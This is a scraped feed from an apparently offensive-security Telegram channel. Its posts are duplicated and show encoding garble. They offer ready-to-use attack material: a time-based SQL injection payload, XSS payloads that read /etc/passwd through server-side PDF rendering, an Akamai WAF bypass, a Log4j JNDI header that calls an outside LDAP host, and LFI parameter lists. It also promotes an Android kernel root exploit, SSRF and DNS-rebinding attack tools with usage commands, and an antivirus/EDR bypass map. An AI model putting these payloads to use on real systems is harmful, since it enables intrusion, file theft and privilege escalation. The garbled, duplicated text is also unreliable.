Canarytokens
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
π Site
#Pentesting #BugBounty
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
π Site
#Pentesting #BugBounty
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!
Site
ΞYγIαγ³Ξ πΎ
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Site
ΞYγIαγ³Ξ πΎ
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘2π₯1
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘2β€1π₯1
For 0Day SQLI in
(app extension)
payload was:
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘1π1π₯1
XSS to Exfiltrate Data from PDFs
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(βGETβ,βfile:///etc/hostsβ);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(βGETβ,βfile:///etc/passwdβ);x.send();</script>How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯3β€2β‘1
βββ(BugCod3γΏkali)-[~]
ββ$ sudo rm -rf *1402
βββ(BugCod3γΏkali)-[~]
ββ$ sudo mkdir 1403#Notification #NewYear
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€5β‘1π₯1
If you are testing API, before fuzzing observe these:
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π3β€1β‘1π₯1
Akamai WAF bypass XSS
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1
Log4j π Application was running java
Vulnerable header :
#BugBounty #Tips #Security
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1
Easy P1 π₯
Add to your wordlist
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€1β‘1π₯1
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
Pixel 7 Pro:
Pixel 7 Pro:
Pixel 7:
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
Github
β¬οΈ Download
π
#C #Exploit #Android #Kernel #Pixel
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keysPixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keysVulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.Github
β¬οΈ Download
π
BugCod3#C #Exploit #Android #Kernel #Pixel
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€1β‘1π1π₯1
java2S3 Amazon S3 Bucket Enumeration Tool
Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
βͺοΈ Fetches HTTP status codes for subdomains
βͺοΈ Retrieves JavaScript URLs associated with each subdomain
βͺοΈ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
Usage:
Create a text file (
Github
β¬οΈ Download
π
#Python #Amazon #S3 #Buckets
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
βͺοΈ Fetches HTTP status codes for subdomains
βͺοΈ Retrieves JavaScript URLs associated with each subdomain
βͺοΈ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests
Usage:
Create a text file (
input.txt) containing a list of subdomains (one per line).python js2s3.py input.txt example.com output.txt
Github
β¬οΈ Download
π
BugCod3#Python #Amazon #S3 #Buckets
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘2β€1π₯1
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
Usage (command line):
Github
β¬οΈ Download
π
#Ruby #Proxy #SSRF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
gem install ssrf_proxy
Usage (command line):
ssrf-proxy [options] -u <SSRF URL>
ssrf-proxy -u http://target/?url=xxURLxx
Github
β¬οΈ Download
π
BugCod3#Ruby #Proxy #SSRF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘1π₯1
httprebind
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
Usage:
Where
Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
β¬οΈ Download
π
#Python #DNS #SSRF #Attack
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
sudo pip install dnslib flask flask_cors
Usage:
sudo python httprebind.py domain.name serverIp mode
Where
mode is one of: ec2, ecs, gcloudMake sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
β¬οΈ Download
π
BugCod3#Python #DNS #SSRF #Attack
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1
hackerone-reports
Top disclosed reports from HackerOne
Tops of HackerOne reports. All reports' raw info stored in
1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py
Github
β¬οΈ Download
π
#BugBounty #Reports #HackeOne
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Top disclosed reports from HackerOne
Tops of HackerOne reports. All reports' raw info stored in
data.csv. Scripts to update this file are written in Python 3 and require chromedriver and Chromium executables at PATH. Every script contains some info about how it works. The run order of scripts:1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py
Github
β¬οΈ Download
π
BugCod3#BugBounty #Reports #HackeOne
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘3β€1π₯1
DOM-XSS-SiteMinder
Payload:
π Nuclei Template
#XSS #DOM
β β β β β β β β β β
π€ T.me/BugCod3BOT
β T.me/BugCod3Topic
π£ T.me/BugCod3
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e#XSS #DOM
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3β‘2β€1π€£1
Form Finder
This script can be used to find HTML forms in the list of endpoints/URLs.
Usage:
πΈ Github
β¬οΈ Donwload
π
#Python #Form #Finder
β β β β β β β β β β
π€ T.me/BugCod3BOT
β T.me/BugCod3Topic
π£ T.me/BugCod3
This script can be used to find HTML forms in the list of endpoints/URLs.
Usage:
python3 formfinder.py endpoints.txt
BugCod3#Python #Form #Finder
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3β‘2β€1π1
Algolia AppId+API-KEY PoC to show permissions:
If ACL is Search only, it's likely to be a P5, if it has other sensitive permissions.. it's a P1/P2
#BugBounty #Tips
β β β β β β β β β β
π€ T.me/BugCod3BOT
β T.me/BugCod3Topic
π£ T.me/BugCod3
curl "https://[APP-ID]-dsn.algolia.net/1/keys/[APPKEY]?x-algolia-application-id=[APP-ID]&x-algolia-api-key=[ApiKey]"If ACL is Search only, it's likely to be a P5, if it has other sensitive permissions.. it's a P1/P2
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
β€2β‘2π₯2π€£1
Search inside every file, folder and subfolder for OSINT
(based on the book The Hobbit, Smaug the dragon)
It is not an online tool. This program scans your local database to search a variable you specified inside each file with bruteforce.
This tool has been created for utility to search inside every file which contains your input,
and also not all files/folders are supported (outside UTF-8 unicode) atm.
Could be useful for osint individuals.
make inside smaug-mainmake inside smaug-main.Makefile under smaug-main.BugCod3#C #Smaug #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
β‘3β€2π₯2
(4.2.4) has been released. Enjoy.
#Wireshark #Released
Please open Telegram to view this post
VIEW IN TELEGRAM
β€3β‘2π₯2
BypassAV
This map lists the essential techniques to bypass anti-virus and EDR
π¬
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs
πΈ Github
β¬οΈ Download
π
#Pentest #AV #Bypass
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
This map lists the essential techniques to bypass anti-virus and EDR
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs
BugCod3#Pentest #AV #Bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
β€3β‘2π₯2π1